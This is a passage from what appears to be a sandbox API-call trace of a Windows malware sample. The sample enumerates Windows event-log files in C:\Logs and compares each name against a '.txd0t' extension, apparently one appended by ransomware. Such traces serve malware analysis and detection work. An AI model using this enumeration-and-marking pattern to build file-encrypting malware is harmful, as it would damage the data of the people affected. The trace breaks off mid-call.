StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.497] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59d6aeec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t", cAlternateFileName="MIDD4B~1.TXD")) returned 1 [0118.497] StrCmpW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t", psz2=".") returned 1 [0118.497] StrCmpW (psz1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t", psz2="..") returned 1 [0118.497] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.497] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.507] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t" [0118.532] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.txd0t") returned=".txd0t" [0118.543] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.545] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cef47f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cef47f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59d6aeec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t", cAlternateFileName="MI8940~1.TXD")) returned 1 [0118.550] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t", psz2=".") returned 1 [0118.555] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t", psz2="..") returned 1 [0118.555] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.555] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.555] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t" [0118.555] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Admin.evtx.txd0t") returned=".txd0t" [0118.555] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.555] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59d44ce5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t", cAlternateFileName="MIA5C0~1.TXD")) returned 1 [0118.580] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.581] StrCmpW (psz1="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.582] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.584] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.588] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t" [0118.589] PathFindExtensionW (pszPath="Microsoft-Windows-DeviceSetupManager%4Operational.evtx.txd0t") returned=".txd0t" [0118.592] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.596] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc967f17e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc967f17e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59e0391d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t", cAlternateFileName="MI5874~1.TXD")) returned 1 [0118.600] StrCmpW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t", psz2=".") returned 1 [0118.602] StrCmpW (psz1="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t", psz2="..") returned 1 [0118.602] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.602] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.604] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t" [0118.609] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcp-Client%4Admin.evtx.txd0t") returned=".txd0t" [0118.612] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.613] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc96cb64b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc96cb64b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a0198fe, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t", cAlternateFileName="MI1FD1~1.TXD")) returned 1 [0118.614] StrCmpW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t", psz2=".") returned 1 [0118.615] StrCmpW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t", psz2="..") returned 1 [0118.615] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.618] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.619] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t" [0118.620] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.txd0t") returned=".txd0t" [0118.620] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.621] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a065fd9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t", cAlternateFileName="MIB57C~1.TXD")) returned 1 [0118.623] StrCmpW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.625] StrCmpW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.627] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.628] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.628] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t" [0118.631] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx.txd0t") returned=".txd0t" [0118.633] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.634] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0x5a065fd9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t", cAlternateFileName="MI0ACA~1.TXD")) returned 1 [0118.637] StrCmpW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.640] StrCmpW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.642] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.644] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.648] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t" [0118.653] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.txd0t") returned=".txd0t" [0118.654] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0118.658] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a1e35d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t", cAlternateFileName="MI347A~1.TXD")) returned 1 [0118.659] StrCmpW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t", psz2=".") returned 1 [0118.660] StrCmpW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t", psz2="..") returned 1 [0118.660] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0118.663] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0118.664] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t" [0119.091] PathFindExtensionW (pszPath="Microsoft-Windows-GroupPolicy%4Operational.evtx.txd0t") returned=".txd0t" [0119.091] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.091] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a170e66, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t", cAlternateFileName="MIDA33~1.TXD")) returned 1 [0119.091] StrCmpW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.091] StrCmpW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.091] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.091] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.091] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t" [0119.091] PathFindExtensionW (pszPath="Microsoft-Windows-HotspotAuth%4Operational.evtx.txd0t") returned=".txd0t" [0119.092] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.092] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a1bd3c4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t", cAlternateFileName="MI57B1~1.TXD")) returned 1 [0119.092] StrCmpW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t", psz2=".") returned 1 [0119.092] StrCmpW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t", psz2="..") returned 1 [0119.092] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.092] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.092] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t" [0119.092] PathFindExtensionW (pszPath="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.txd0t") returned=".txd0t" [0119.092] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.092] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a1e35d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-International%4Operational.evtx.txd0t", cAlternateFileName="MI9FED~1.TXD")) returned 1 [0119.092] StrCmpW (psz1="Microsoft-Windows-International%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.092] StrCmpW (psz1="Microsoft-Windows-International%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.092] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.092] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.092] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-International%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.txd0t" [0119.092] PathFindExtensionW (pszPath="Microsoft-Windows-International%4Operational.evtx.txd0t") returned=".txd0t" [0119.092] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.092] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a255d1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t", cAlternateFileName="MI911F~1.TXD")) returned 1 [0119.092] StrCmpW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.092] StrCmpW (psz1="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.092] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.092] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.092] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t" [0119.092] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Boot%4Operational.evtx.txd0t") returned=".txd0t" [0119.092] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.092] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a314850, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t", cAlternateFileName="MIDAB4~1.TXD")) returned 1 [0119.092] StrCmpW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t", psz2=".") returned 1 [0119.092] StrCmpW (psz1="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t", psz2="..") returned 1 [0119.092] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.092] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.092] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t" [0119.092] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-EventTracing%4Admin.evtx.txd0t") returned=".txd0t" [0119.092] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.093] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5071f8b0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5071f8b0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a2c8c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t", cAlternateFileName="MI3E50~1.TXD")) returned 1 [0119.093] StrCmpW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t", psz2=".") returned 1 [0119.093] StrCmpW (psz1="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t", psz2="..") returned 1 [0119.093] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.093] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.093] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t" [0119.093] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-PnP%4Configuration.evtx.txd0t") returned=".txd0t" [0119.093] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.093] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ebf6d7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc8ebf6d7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a2c8c55, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t", cAlternateFileName="MIAAF5~1.TXD")) returned 1 [0119.093] StrCmpW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t", psz2=".") returned 1 [0119.093] StrCmpW (psz1="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t", psz2="..") returned 1 [0119.093] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.093] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.093] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t" [0119.093] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx.txd0t") returned=".txd0t" [0119.093] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.093] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5090f75d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5090f75d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a314850, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t", cAlternateFileName="MI3346~1.TXD")) returned 1 [0119.093] StrCmpW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t", psz2=".") returned 1 [0119.093] StrCmpW (psz1="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t", psz2="..") returned 1 [0119.093] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0119.093] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0119.094] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t" [0119.094] PathFindExtensionW (pszPath="Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx.txd0t") returned=".txd0t" [0119.094] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.094] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd75102f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd75102f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5a33aa7c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx.txd0t", cAlternateFileName="MIF0C1~1.TXD")) returned 1 [0119.094] StrCmpW 